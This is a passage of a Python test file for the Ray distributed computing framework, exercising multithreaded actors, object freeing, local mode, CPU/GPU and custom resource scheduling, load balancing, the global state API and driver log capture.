assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the release history: the plasma client cache currently maintains a
# 64-item list, so if that number changes this test will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
# Make sure objects are immutable; this example is why we need to copy
# arguments before passing them into remote functions in local mode.
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
    # resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
    # reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the result of another
        # remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
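# Illustrative worked example of the check performed by attempt_to_load_balance
# above; the node names and counts here are made up. 100 tasks over
# num_nodes=3 with minimum_count=10 pass for a split like [40, 35, 25], but
# fail for [95, 3, 2] because one node fell below the minimum.
def _example_balance_check():
    locations = ["a"] * 40 + ["b"] * 35 + ["c"] * 25
    names = set(locations)
    counts = [locations.count(name) for name in names]
    return len(names) == 3 and all(count >= 10 for count in counts)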
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
